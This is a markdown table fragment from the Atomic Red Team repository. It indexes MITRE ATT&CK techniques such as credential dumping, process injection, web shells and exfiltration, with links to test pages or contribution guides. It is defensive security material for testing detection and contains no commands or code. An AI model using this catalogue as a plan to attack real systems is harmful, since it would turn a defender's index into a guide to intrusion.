| | [PowerShell](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1086?T1086.md) | [Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1157?T1157.md) | [New Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1050?T1050.md) | [Disabling Security Tools](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1089/T1089.md) | [Network Sniffing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1040?T1040.md) | [System Network Configuration Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1016?T1016.md) | [Third-party Software](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1072?T1072.md) | | | [Remote Access Tools](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1219?T1219.md) |
|
||||
| | [Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1121/T1121.md) | [External Remote Services](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1133?T1133.md) | [Path Interception](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1034?T1034.md) | [Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1211?T1211.md) | [Password Filter DLL](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1174?T1174.md) | [System Network Connections Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1049?T1049.md) | [Windows Admin Shares](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1077?T1077.md) | | | [Remote File Copy](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1105/T1105.md) |
|
||||
| | [Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1117/T1117.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1044?T1044.md) | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1150?T1150.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1181?T1181.md) | [Private Keys](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1145?T1145.md) | [System Owner/User Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1033?T1033.md) | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1028?T1028.md) | | | [Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1071?T1071.md) |
|
||||
| | [Rundll32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1085/T1085.md) | [Hidden Files and Directories](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1158/T1158.md) | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1013?T1013.md) | [File Deletion](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1107/T1107.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1091?T1091.md) | [System Service Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1007?T1007.md) | | | | [Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1032?T1032.md) |
|
||||
| | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1053?T1053.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179/T1179.md) | [Process Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1055?T1055.md) | [File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1006?T1006.md) | [Securityd Memory](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1167?T1167.md) | [System Time Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1124?T1124.md) | | | | [Standard Non-Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1095?T1095.md) |
|
||||
| | [Scripting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1064?T1064.md) | [Hypervisor](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1062?T1062.md) | [SID-History Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1178?T1178.md) | [Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1144?T1144.md) | [Two-Factor Authentication Interception](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1111?T1111.md) | | | | | [Uncommonly Used Port](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1065?T1065.md) |
|
||||
| | [Service Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1035?T1035.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1183?T1183.md) | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1053?T1053.md) | [HISTCONTROL](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1148/T1148.md) | | | | | | [Web Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1102?T1102.md) |
|
||||
| | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1218?T1218.md) | [Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1215?T1215.md) | [Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1058?T1058.md) | [Hidden Files and Directories](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1158/T1158.md) | | | | | | |
|
||||
| | [Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1216?T1216.md) | [LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1161?T1161.md) | [Setuid and Setgid](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1166?T1166.md) | [Hidden Users](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1147?T1147.md) | | | | | | |
|
||||
| | [Source](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1153?T1153.md) | [LSASS Driver](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1177?T1177.md) | [Startup Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1165?T1165.md) | [Hidden Window](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1143?T1143.md) | | | | | | |
|
||||
| | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1151?T1151.md) | [Launch Agent](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1159?T1159.md) | [Sudo](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1169?T1169.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1183?T1183.md) | | | | | | |
|
||||
| | [Third-party Software](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1072?T1072.md) | [Launch Daemon](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1160?T1160.md) | [Sudo Caching](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1206?T1206.md) | [Indicator Blocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1054?T1054.md) | | | | | | |
|
||||
| | [Trap](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1154?T1154.md) | [Launchctl](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1152?T1152.md) | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md) | [Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1066?T1066.md) | | | | | | |
|
||||
| | [Trusted Developer Utilities](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1127/T1127.md) | [Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1168?T1168.md) | [Web Shell](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1100?T1100.md) | [Indicator Removal on Host](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1070?T1070.md) | | | | | | |
|
||||
| | [User Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1204?T1204.md) | [Login Item](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1162?T1162.md) | | [Indirect Command Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1202?T1202.md) | | | | | | |
|
||||
| | [Windows Management Instrumentation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1047?T1047.md) | [Logon Scripts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1037?T1037.md) | | [Install Root Certificate](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1130/T1130.md) | | | | | | |
|
||||
| | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1028?T1028.md) | [Modify Existing Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1031?T1031.md) | | [InstallUtil](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118/T1118.md) | | | | | | |
|
||||
| | | [Netsh Helper DLL](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1128?T1128.md) | | [LC_MAIN Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1149?T1149.md) | | | | | | |
|
||||
| | | [New Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1050?T1050.md) | | [Launchctl](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1152?T1152.md) | | | | | | |
|
||||
| | | [Office Application Startup](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1137?T1137.md) | | [Masquerading](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1036?T1036.md) | | | | | | |
|
||||
| | | [Path Interception](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1034?T1034.md) | | [Modify Registry](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1112?T1112.md) | | | | | | |
|
||||
| | | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1150?T1150.md) | | [Mshta](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1170/T1170.md) | | | | | | |
|
||||
| | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1205?T1205.md) | | [NTFS File Attributes](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1096?T1096.md) | | | | | | |
|
||||
| | | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1013?T1013.md) | | [Network Share Connection Removal](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1126?T1126.md) | | | | | | |
|
||||
| | | [Rc.common](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1163?T1163.md) | | [Obfuscated Files or Information](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1027?T1027.md) | | | | | | |
|
||||
| | | [Re-opened Applications](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1164?T1164.md) | | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1150?T1150.md) | | | | | | |
|
||||
| | | [Redundant Access](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1108?T1108.md) | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1205?T1205.md) | | | | | | |
|
||||
| | | [Registry Run Keys / Start Folder](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1060?T1060.md) | | [Process Doppelgänging](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1186?T1186.md) | | | | | | |
|
||||
| | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1198?T1198.md) | | [Process Hollowing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1093?T1093.md) | | | | | | |
|
||||
| | | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1053?T1053.md) | | [Process Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1055?T1055.md) | | | | | | |
|
||||
| | | [Screensaver](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1180?T1180.md) | | [Redundant Access](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1108?T1108.md) | | | | | | |
|
||||
| | | [Security Support Provider](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1101?T1101.md) | | [Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1121/T1121.md) | | | | | | |
|
||||
| | | [Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1058?T1058.md) | | [Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1117/T1117.md) | | | | | | |
|
||||
| | | [Shortcut Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1023?T1023.md) | | [Rootkit](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1014?T1014.md) | | | | | | |
|
||||
| | | [Startup Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1165?T1165.md) | | [Rundll32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1085/T1085.md) | | | | | | |
|
||||
| | | [System Firmware](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1019?T1019.md) | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1198?T1198.md) | | | | | | |
|
||||
| | | [Time Providers](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1209?T1209.md) | | [Scripting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1064?T1064.md) | | | | | | |
|
||||
| | | [Trap](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1154?T1154.md) | | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1218?T1218.md) | | | | | | |
|
||||
| | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md) | | [Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1216?T1216.md) | | | | | | |
|
||||
| | | [Web Shell](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1100?T1100.md) | | [Software Packing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1045?T1045.md) | | | | | | |
|
||||
| | | [Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1084?T1084.md) | | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1151?T1151.md) | | | | | | |
|
||||
| | | [Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1004?T1004.md) | | [Timestomp](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1099/T1099.md) | | | | | | |
|
||||
| | | | | [Trusted Developer Utilities](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1127/T1127.md) | | | | | | |
|
||||
| | | | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md) | | | | | | |
|
||||
| | | | | [Web Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1102?T1102.md) | | | | | | |
|
||||
| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [.bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Bash History](./T1139/T1139.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Automated Collection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Compressed](./T1002/T1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Staged](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| [Spearphishing Attachment](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Dynamic Data Exchange](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Application Shimming](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Application Shimming](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credentials in Files](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Network Service Scanning](./T1046/T1046.md) | [Logon Scripts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data from Information Repositories](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exfiltration Over Alternative Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Custom Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| [Spearphishing Link](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Execution through API](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Authentication Package](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Network Share Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Pass the Hash](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data from Local System](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exfiltration Over Command and Control Channel](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Encoding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| [Spearphishing via Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Execution through Module Load](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Code Signing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation for Credential Access](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Password Policy Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Pass the Ticket](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data from Network Shared Drive](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exfiltration Over Other Network Medium](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Obfuscation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| [Supply Chain Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation for Client Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Bootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Component Firmware](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Forced Authentication](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Peripheral Device Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Remote Desktop Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data from Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exfiltration Over Physical Medium](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Domain Fronting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| [Trusted Relationship](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Graphical User Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Browser Extensions](./T1176/T1176.md) | [Exploitation for Privilege Escalation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hooking](./T1179/T1179.md) | [Permission Groups Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Remote File Copy](./T1105/T1105.md) | [Email Collection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Scheduled Transfer](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Fallback Channels](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [InstallUtil](./T1118/T1118.md) | [Change Default File Association](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Input Capture](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Process Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Input Capture](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Multi-Stage Channels](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| | [LSASS Driver](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Component Firmware](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [DCShadow](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Input Prompt](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Query Registry](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Man in the Browser](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Multi-hop Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| | [Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hooking](./T1179/T1179.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Kerberoasting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Remote System Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [SSH Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Screen Capture](./T1113/T1113.md) | | [Multiband Communication](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| | [Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Create Account](./T1136/T1136.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [DLL Side-Loading](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Keychain](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Security Software Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Shared Webroot](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Video Capture](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Multilayer Encryption](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
